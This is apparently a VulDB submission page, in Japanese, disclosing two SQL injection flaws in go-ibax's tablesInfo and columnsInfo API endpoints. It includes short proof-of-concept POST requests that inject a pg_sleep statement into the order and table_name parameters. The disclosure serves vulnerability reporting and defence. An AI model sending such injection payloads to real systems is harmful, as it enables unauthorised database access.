| タイトル | SQL Injection vulnerabilities in go-ibax via order,table_name parameter |
|---|
| 説明 | There are two SQL injection vulnerabilities.
POC:
POST https://testnet-hk1.ibax.network:5079/api/v2/open/tablesInfo
data: page=1&limit=1&order=1; select pg_sleep(3)--
POC:
POST https://testnet-hk1.ibax.network:5079/api/v2/open/columnsInfo
data: table_name=1; select pg_sleep(3)--
Reported by Tom(@Tomy) from QSec-Team of Cyber Security Department at Qi'anxin Group on 2022-11-01 |
|---|
| ソース | ⚠️ https://github.com/IBAX-io/go-ibax/issues/2060 |
|---|
| ユーザー | Tomy (UID 34751) |
|---|
| 送信 | 2022年11月01日 12:36 (4 年 ago) |
|---|
| モデレーション | 2022年11月01日 16:38 (4 hours later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 212634 [IBAX go-ibax /api/v2/open/tablesInfo SQLインジェクション] |
|---|
| ポイント | 20 |
|---|